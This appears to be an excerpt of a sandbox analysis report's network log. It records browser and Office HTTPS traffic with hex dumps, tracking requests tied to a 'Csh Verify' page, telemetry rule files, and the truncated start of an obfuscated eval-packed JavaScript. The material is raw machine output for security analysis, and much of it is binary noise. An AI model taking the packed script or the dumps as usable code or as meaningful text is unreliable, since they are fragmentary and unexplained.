                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: 3d 13 e0 8f ec fb e0 8f 13 78 6b 5e bb b7 d5 34 bf 19 ac c7 4f 8e d4 ca d7 36 d3 69 52 49 7f f6 79 62 96 3d dc ab 28 c8 35 c8 fc 51 fd 9d 6c 7e 1c c7 79 26 a1 e2 6d 27 45 d7 6e 60 93 59 d2 74 69 44 ce 2e 2d d2 f4 c3 15 ba dc e4 3f 99 22 a6 42 31 e4 03 51 e9 1f b5 ae b9 e1 b8 56 0d 27 43 f0 b6 8f 66 7e ce cd 6f 6f 64 76 ef 82 e4 dc 2b 13 9c b6 58 9c e4 f4 aa ba b7 ed 37 ad 78 87 48 5b 5b ed 37 c3 f7 37 7e 4b d8 c5 ab 4b 65 e6 5e 58 5a b5 df da 4c 71 92 70 40 62 71 9e 42 82 b9 f9 b2 38 e8 e5 f9 ec 31 2e a7 37 ba df 78 dd 68 bc ad eb 6d 7b 6a 74 4b 17 95 4a 92 8f 2e ab c9 f7 7d 56 b7 fc 0d 6f db 4b e0 1d 8f ec ef f1 37 53 b5 82 6b 5d 3e 1d 53 55 bd 7d 23 40 82 26 f2 ec 34 98 a4 58 e2 62 e7 23 e6 93 cd 21 49 23 0d d3 8a ef fe 1e 7e c4 36 be 1f f8 b3 e1 bb 3d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: =xk^4O6iRIyb=(5Ql~y&m'En`YtiD.-?"B1QV'Cf~oodv+X7xH[[77~KKe^XZLqp@bqB81.7xhm{jtKJ.}VoK7Sk]>SU}#@&4Xb#!I#~6=
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: f0 af 1f f1 fd e3 8f fc 19 c3 ff 00 c6 2b e6 75 f1 46 a9 ff 00 41 6d 63 e9 f6 e9 f8 ff 00 c7 e9 7f e1 27 d5 7f e8 2d ac 7f e0 74 ff 00 fc 5d 3f f5 cf 3c ff 00 a0 ba 9f f8 13 0f f5 6f 2a ff 00 a0 78 7d c8 fa 5f fe 1c dd f0 af 1f f1 fd e3 8f fc 19 c3 ff 00 c6 28 ff 00 87 37 7c 2b ff 00 9f ef 1c 7f e0 ce 1f fe 31 5f 34 7f c2 4f aa ff 00 d0 5b 58 ff 00 c0 e9 ff 00 f8 ba ab aa f8 b7 59 8a c6 7f 2b 5a d6 a3 7f 29 d9 5c 5f cd f2 90 a4 8c 82 dd 0d 2f f5 cf 3c ff 00 a0 ba 9f f8 13 0f f5 6f 2a ff 00 a0 78 7d c8 fa 84 7f c1 1c 3e 15 37 4b ef 1c 1c 75 c6 a9 0f 1f f9 02 8f f8 73 6f c2 bc 7f c7 f7 8e 3f f0 67 0f ff 00 18 af 22 fd a6 3c 45 a8 d9 7c 46 b2 8e d7 52 d4 6d e3 ff 00 84 7b 4a 7f 2a 1b b9 22 57 76 b6 5c bb 61 ba e0 7d 6b 82 97 c4 fa af 97 ff 00 21 6d 63 e8 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: +uFAmc'-t]?<o*x}_(7|+1_4O[XY+Z)\_/<o*x}>7Kuso?g"<E|FRm{J*"Wv\a}k!mco
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: ca ab e2 9d 50 8c 9d 57 58 cf fd 7f 4d ff 00 c5 d4 69 e2 6d 50 15 ff 00 89 be ad ff 00 81 f2 ff 00 f1 54 7f ae 79 e7 fd 05 d4 ff 00 c0 98 3e 19 ca 97 fc c3 c3 ff 00 01 47 d5 df f0 e6 ef 85 78 ff 00 8f ef 1c 7f e0 ce 1f fe 31 47 fc 39 bb e1 5f fc ff 00 78 e3 ff 00 06 70 ff 00 f1 8a f9 4e 4f 13 ea 84 0f f8 9b 6a ff 00 f8 1d 30 ff 00 d9 e8 8f c4 fa a0 1f f2 16 d5 ff 00 f0 3a 6f fe 2e 8f f5 cf 3c ff 00 a0 ba 9f f8 13 27 fd 5a ca bf e8 1e 1f f8 0a 3e ac 1f f0 46 ef 85 6a 7f e3 fb c7 43 1e 9a 9c 3f fc 62 bd 8f 47 f8 4d a6 fc 10 fd 98 ee 3c 27 a2 b5 e1 d1 fc 3f a0 5c da 5a 8b a9 3c c9 42 08 a5 3f 31 01 72 79 1c e3 b5 7e 79 0f 14 ea 80 2f fc 4d b5 7e a3 1f e9 b3 7f f1 75 f7 8f c0 9b 99 2f ff 00 60 5d 26 69 a7 9a e6 66 f0 b4 ec f2 c8 e5 9e 4f dd 49 cb 13 c9 af 3f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: PWXMimPTy>Gx1G9_xpNOj0:o.<'Z>FjC?bGM<'?\Z<B?1ry~y/M~u/`]&ifOI?
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC1390INData Raw: 1e 79 e9 eb 48 ad 95 14 c9 13 6a 55 8c 50 04 2c 72 78 35 df 78 0c ff 00 c6 33 7c 4e ff 00 b0 a6 83 ff 00 a3 cd 70 77 03 00 7d 6b bc f0 1f fc 9b 37 c4 ef fb 0a 68 5f fa 3c d0 12 d8 e0 43 66 46 a5 38 22 96 21 c9 fa 0a 93 14 01 0e 07 af eb 4a 14 1f 5f ce a5 c5 46 78 90 fd 05 00 08 80 c7 9e 7a 7a d3 54 02 07 3f ad 49 17 fa a5 fa 52 4c 30 9f 88 fe 74 00 dd bf 5f ce 8d bf 5f ce 96 8a 00 8e 1f f5 ab f5 af bf 3f 67 81 bb fe 09 f5 a3 ff 00 b3 e1 39 f1 ff 00 7e a4 af 80 e1 ff 00 58 bf ef 7f 85 7d f9 fb 3b ff 00 ca 3e 74 9f fb 14 e6 ff 00 d1 72 53 88 a4 65 7f c1 47 50 bf c3 4f 0f e3 b6 b6 3f f4 44 95 f2 3a c4 db be ef 61 de be bc ff 00 82 8b 0d df 0d 74 1f fb 0d 0f fd 11 25 7c 92 db 91 f1 ed 51 29 24 c8 20 e8 48 db f7 68 8d c4 bf 74 66 a6 36 8c ce c7 70 eb 8e 94 d8
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: yHjUP,rx5x3|Npw}k7h_<CfF8"!J_FxzzT?IRL0t__?g9~X};>trSeGPO?D:at%|Q)$ Hhtf6p


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          27192.168.2.749753149.56.240.1294432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC568OUTGET /stats/0.php?4525035&@f16&@g1&@h1&@i1&@j1728897152149&@k0&@l1&@mCsh%20Verify&@n0&@ohttps%3A%2F%2Fald.my.id%2F&@q0&@r0&@s0&@ten-US&@u1280&@b1:105209297&@b3:1728897152&@b4:js15_as.js&@b5:-240&@a-_0.2.1&@vhttps%3A%2F%2Fald.my.id%2F&@w HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: s4.histats.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:34 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 380
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC380INData Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 23 33 56 69 73 2e 20 74 6f 64 61 79 3d 37 31 33 30 22 3b 63 68 66 68 32 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: _HST_cntval="#3Vis. today=7130";chfh2(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="as


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          28192.168.2.74975013.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:34 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 486
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: aec2753b-d01e-007a-1ef5-1cf38c000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091234Z-17db6f7c8cfnqpbkckdefmqa44000000063000000000atrm
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          29192.168.2.74975113.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:34 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 427
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: c03f5215-301e-005d-4a1d-1ce448000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091234Z-17db6f7c8cfcrfgzd01a8emnyg00000003qg0000000050n1
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          30192.168.2.74975213.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:34 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 407
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 0f9ac3ff-201e-0003-4016-1cf85a000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091234Z-17db6f7c8cf9c22xp43k2gbqvn00000003xg000000000qqk
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          31192.168.2.74975513.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:34 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 407
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: e456ac6c-b01e-0097-6bbf-1a4f33000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091234Z-17db6f7c8cfqkqk8bn4ck6f72000000005w00000000090th
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          32192.168.2.749748151.101.129.2294432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:34 UTC375OUTGET /gh/igniel/blogger@master/iglo/v2.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: cdn.jsdelivr.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC753INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 4183
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, s-maxage=43200
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          X-JSD-Version: master
                                                                                                                                                                                                                                                                                                                                                                          X-JSD-Version-Type: branch
                                                                                                                                                                                                                                                                                                                                                                          ETag: W/"1057-NqqERqSFe0flT912NfuehVLlGkw"
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:35 GMT
                                                                                                                                                                                                                                                                                                                                                                          X-Served-By: cache-fra-eddf8230107-FRA, cache-nyc-kteb1890081-NYC
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: HIT, MISS
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:35 UTC1378INData Raw: 65 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 70 2c 61 2c 63 2c 6b 2c 65 2c 64 29 7b 65 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 28 63 3c 61 3f 27 27 3a 65 28 70 61 72 73 65 49 6e 74 28 63 2f 61 29 29 29 2b 28 28 63 3d 63 25 61 29 3e 33 35 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 63 2b 32 39 29 3a 63 2e 74 6f 53 74 72 69 6e 67 28 33 36 29 29 7d 3b 69 66 28 21 27 27 2e 72 65 70 6c 61 63 65 28 2f 5e 2f 2c 53 74 72 69 6e 67 29 29 7b 77 68 69 6c 65 28 63 2d 2d 29 7b 64 5b 65 28 63 29 5d 3d 6b 5b 63 5d 7c 7c 65 28 63 29 7d 6b 3d 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 5b 65 5d 7d 5d 3b 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 27 5c 5c 77 2b 27 7d 3b 63 3d 31 7d 3b 77 68 69 6c 65 28 63 2d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c-
